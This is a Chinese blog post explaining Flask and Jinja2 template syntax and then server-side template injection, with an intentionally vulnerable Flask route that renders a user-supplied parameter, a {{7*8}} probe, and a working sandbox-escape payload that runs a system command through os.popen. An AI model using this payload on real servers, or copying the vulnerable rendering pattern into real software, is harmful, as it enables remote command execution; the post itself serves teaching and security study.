
<html>
  <head lang="zh">
        <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
        <meta content="yes" name="apple-mobile-web-app-capable"/>
        <meta content="black" name="apple-mobile-web-app-status-bar-style"/>
        <meta content="telephone=no" name="format-detection"/>
        <meta name="renderer" content="webkit">
    <title>Flask/jinjia2模板语法注入 | P1and</title>
<link href="https://p1and.github.io/styles/main.css" type="text/css" rel="stylesheet"/>
<script type="text/javascript" src="https://p1and.github.io/media/scripts/jquery.js"></script>
<script type="text/javascript" src="https://p1and.github.io/media/scripts/basic.js"></script>
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  </head>

  <body>
     <div class="header">
      <div class="logo_title">
		  
        <div class="title animated fadeInDown"><img src="https://p1and.github.io/images/avatar.png?v=1625729119097"/>

          <h1 title="P1and" class="weaklink"><a href="/">P1and</a>

          </h1>

          <div class="navbar weaklink">
            <div class="normal_nav">

<div class="bitcron_nav_container">


  <div class="bitcron_nav">
    <div class="mixed_site_nav_wrap site_nav_wrap">
		
      <ul class="mixed_site_nav site_nav sm sm-base">
 
  <li><a id="d2ef19af68cc211e98f8a0242ac110003" href="/" class="selected active current nav__item" >首页</a>

  </li>
 
  <li><a id="d2ef19af68cc211e98f8a0242ac110003" href="/archives" class="selected active current nav__item" >归档</a>

  </li>
 
  <li><a id="d2ef19af68cc211e98f8a0242ac110003" href="/tags" class="selected active current nav__item" >标签</a>

  </li>
 

      </ul>

      <div class="clear clear_nav_inline_end"></div>

    </div>

  </div>



  <div class="clear clear_nav_end"></div>

</div>

            </div>

            <div class="hamberger"><i class="fa fa-bars"></i>
<i class="fa fa-times"></i>

            </div>

          </div>

        </div>

      </div>

      <div class="hidden_nav animated fadeInDown">

<div class="bitcron_nav_container">


  <div class="bitcron_nav">
    <div class="mixed_site_nav_wrap site_nav_wrap">
      <ul class="mixed_site_nav site_nav sm sm-base">
		  
	
  <li><a id="d2ef19af68cc211e98f8a0242ac110003" href="/" class="selected active current nav__item" >首页</a>

  </li>


  <li><a id="d2ef19af68cc211e98f8a0242ac110003" href="/archives" class="selected active current nav__item" >归档</a>

  </li>


  <li><a id="d2ef19af68cc211e98f8a0242ac110003" href="/tags" class="selected active current nav__item" >标签</a>

  </li>





      </ul>

      <div class="clear clear_nav_inline_end"></div>

    </div>

  </div>



  <div class="clear clear_nav_end"></div>

</div>

      </div>

    </div>


    <div class="main">
      <div class="main-inner">


<div class="content">






  <div class="post_page" >

<div class="post">
  <div class="post_title sm_margin">
    <h2><a>Flask/jinjia2模板语法注入</a>



    </h2>
  </div>

  <div class="post_details">
    <div class="info"><i class="fa fa-clock-o"></i>
<span class="date_info">2021-07-05</span>
<i class="fa fa-eye"></i>

<span class="date_info"><span id="busuanzi_value_page_pv"></span> Views</span>


<i class="fa fa-bookmark-o"></i>
<span class="tags_info weaklink">
	
	<a href="https://p1and.github.io/Epc1StIPf/" class="tag">python</a>


</span>


    </div>

  </div>





  <div class="post_content markdown"><p class="md_block">
    <span class="md_line md_line_start md_line_end"><p>Flask 是一个微型的 Python 开发的 Web 框架，基于Werkzeug WSGI工具箱和Jinjia2 模板引擎。<br>
例如写一个Hello,word：</p>
<pre><code>from flask import Flask
app = Flask(__name__)
@app.route(&quot;/&quot;)
def hello():    
    return &quot;Hello,World!&quot;
 
if __name__ == &quot;__main__&quot;:
    app.run()
</code></pre>
<h3 id="模板">模板</h3>
<p>模板在web开发中广泛使用，它能够有效的将业务逻辑和页面逻辑分开，使代码可读性增强、并且更加容易理解和维护。<br>
模板简单来说就是一个其中包涵占位变量表示动态的部分的文件，模板文件在经过动态赋值后，返回给用户。<br>
Python自带的模板功能极其有限，如果我们想要在模板中使用控制语句，和表达式，以及继承等功能的话，就无法实现了。目前主流的模板系统，最常用的就是jinja2和mako</p>
<h3 id="jinjia2">jinjia2</h3>
<p>jinja2是Flask作者开发的一个模板系统，起初是仿django模板的一个模板引擎，为Flask提供模板支持。</p>
<h4 id="基本语法">基本语法</h4>
<p>在jinjia2中存在三种语法：</p>
<pre><code>1、控制结构{%%}
2、变量取值
3、注释{##}
</code></pre>
<h4 id="过滤器">过滤器</h4>
<p>变量可以通过“过滤器”进行修改，过滤器可以理解为是jinja2里面的内置函数和字符串处理函数。</p>
<table>
<thead>
<tr>
<th>过滤器名称</th>
<th>说明</th>
</tr>
</thead>
<tbody>
<tr>
<td>safe</td>
<td>渲染时值不转义</td>
</tr>
<tr>
<td>capitialize</td>
<td>把值的首字母转换成大写，其他子母转换为小写</td>
</tr>
<tr>
<td>lower</td>
<td>把值转换成小写形式</td>
</tr>
<tr>
<td>upper</td>
<td>把值转换成大写形式</td>
</tr>
<tr>
<td>title</td>
<td>把值中每个单词的首字母都转换成大写</td>
</tr>
<tr>
<td>trim</td>
<td>把值的首尾空格去掉</td>
</tr>
<tr>
<td>striptags</td>
<td>渲染之前把值中所有的HTML标签都删掉</td>
</tr>
<tr>
<td>join</td>
<td>拼接多个值为字符串</td>
</tr>
<tr>
<td>replace</td>
<td>替换字符串的值</td>
</tr>
<tr>
<td>round</td>
<td>默认对数字进行四舍五入，也可以用参数进行控制</td>
</tr>
<tr>
<td>Int</td>
<td>把值转换成整型</td>
</tr>
</tbody>
</table>
<p>那么如何使用这些过滤器呢？ 只需要在变量后面使用管道(|)分割，多个过滤器可以链式调用，前一个过滤器的输出会作为后一个过滤器的输入。</p>
<pre><code># Abc
{{ 'abc' | captialize  }}

# ABC
{{ 'abc' | upper  }}

# Hello World
{{ 'hello world' | title  }}

# HELLO DAXIN
{{ &quot;hello world&quot; | replace('world','daxin') | upper }}

 # 18
{{ 18.18 | round | int }}
</code></pre>
<h4 id="for循环">for循环</h4>
<p>jinja2中的for循环用于迭代Python的数据类型，包括列表，元组和字典。在jinja2中不存在while循环。<br>
for循环的使用方式和Python比较类似，但是没有了句尾的冒号，另外需要使用endfor最为结尾，其实在jinja2中，if也是一样的，结尾需要使用endif。</p>
<h5 id="迭代列表">迭代列表</h5>
<pre><code>&lt;ul&gt;
{% for l_list in lists %}
&lt;li&gt;{{ l_list|title }}&lt;/li&gt;
{% endfor %}
&lt;/ul&gt;
</code></pre>
<h5 id="迭代字典">迭代字典</h5>
<pre><code>&lt;dl&gt;
{% for key, value in my_dict.items() %}
&lt;dt&gt;{{ key }}&lt;/dt&gt;
&lt;dd&gt;{{ value}}&lt;/dd&gt;
{% endfor %}
&lt;/dl&gt;
</code></pre>
<h4 id="宏">宏</h4>
<p>宏类似于Python中的函数，我们在宏中定义行为，还可以进行传递参数，可以类比为python的函数。<br>
在宏中定义一个宏的关键字是macro，后面跟其宏的名称和参数等</p>
<pre><code># 参数age的默认值为18
{% macro input(name,age=18) %}
 
 &lt;input type='text' name=&quot;{{ name }}&quot; value=&quot;{{ age }}&quot; &gt;
 
{% endmacro %}
</code></pre>
<p>调用方法也和Python的类似：</p>
<pre><code>&lt;p&gt;{{ input('daxin') }} &lt;/p&gt;
&lt;p&gt;{{ input('daxin',age=20) }} &lt;/p&gt;
</code></pre>
<h3 id="模板注入">模板注入</h3>
<p>就是模板可被外部控制，任意修改模板输入内容，可被任意构造执行Python内部函数并执行系统命令。Emmmm....可以类比为SQL注入。</p>
<pre><code>from flask import Flask, request
from jinja2 import Template

app = Flask(__name__)

@app.route(&quot;/&quot;)
def index():
    name = request.args.get('name', 'guest')
    t = Template(&quot;Hello &quot; + name)
    return t.render()

if __name__ == &quot;__main__&quot;:
    app.run()
</code></pre>
<p>例如上述代码，程序中通过GET方法参数name 获取值，并将值给变量name ，之后将name直接渲染输出<br>
此时参数name未进行任何防护，可被任意操控。<br>
如 访问 http://127.0.0.1:5000/?name={{7*8}}<br>
{{7*8}}被执行并且输出<br>
<img src="https://p1and.github.io/post-images/1625729105609.png" alt="" loading="lazy"><br>
通过jinjia2模板语法+python沙盒逃逸可以构造相应的poc<br>
官方：</p>
<pre><code>{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__(&quot;os&quot;).popen(&quot;id&quot;).read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
</code></pre>
<figure data-type="image" tabindex="1"><img src="https://p1and.github.io/post-images/1625729114261.png" alt="" loading="lazy"></figure>
<h3 id="参考">参考</h3>
<p>https://vulhub.org/<br>
https://www.runoob.com/<br>
https://www.jianshu.com/p/d92d98607df2</p>
</p>

     <p class="md_block">
    <div class="reward"><div class="reward-button">赏 <span class="reward-code"> <span class="alipay-code"> <img class="alipay-img" src="https://p1and.github.io/media/images/alipay.png"><b>支付宝扫码打赏</b> </span> <span class="wechat-code"> <img class="wechat-img" src="https://p1and.github.io/media/images/wechat.png"><b>微信打赏</b> </span> </span></div></div>
</p> 
</div>

</div>



<link href="https://p1and.github.io/styles/main.css" type="text/css" rel="stylesheet"/>

<div class="doc_comments">

</div>



  </div>
</div>



      </div>




    </div>

   <div class="footer">
<link href="https://p1and.github.io/styles/main.css" type="text/css" rel="stylesheet"/><div class="site_footer_wrap"><div class="site_footer">

      <div class="mysocials"><div class="my_socials">
		   
			   
    
			   
    
			   
    
			   
    
</div><link href="https://p1and.github.io/styles/main.css" type="text/css" rel="stylesheet"/>

      </div>

      <div class="copyright">Powered by P1and
      </div>

</div></div>

    </div>


<style type="text/css">a.back_to_top {
    text-decoration: none;
    position: fixed;
    bottom: 40px;
    right: 30px;
    background: #f0f0f0;
    height: 40px;
    width: 40px;
    border-radius: 50%;
    line-height: 36px;
    font-size: 18px;
    text-align: center;
    transition-duration: .5s;
    transition-propety: background-color;
    display: none;
}

a.back_to_top span {
    color: #888;
}

a.back_to_top:hover {
    cursor: pointer;
    background: #dfdfdf;
}

a.back_to_top:hover span {
    color: #555;
}

@media print, screen and (max-width: 580px) {
    .back_to_top {
        display: none !important;
    }
}



</style><a id="back_to_top" href="#" class="back_to_top"><span>△</span>
</a>
<script type="text/javascript" src="https://p1and.github.io/media/scripts/jquery.js"></script>

<script>$(document).ready((function(_this) {
  return function() {
    var bt;
    bt = $('#back_to_top');
    if ($(document).width() > 480) {
      $(window).scroll(function() {
        var st;
        st = $(window).scrollTop();
        if (st > 30) {
          return bt.css('display', 'block');
        } else {
          return bt.css('display', 'none');
        }
      });
      return bt.click(function() {
        $('body,html').animate({
          scrollTop: 0
        }, 800);
        return false;
      });
    }
  };
})(this));
</script>

</body>

</html>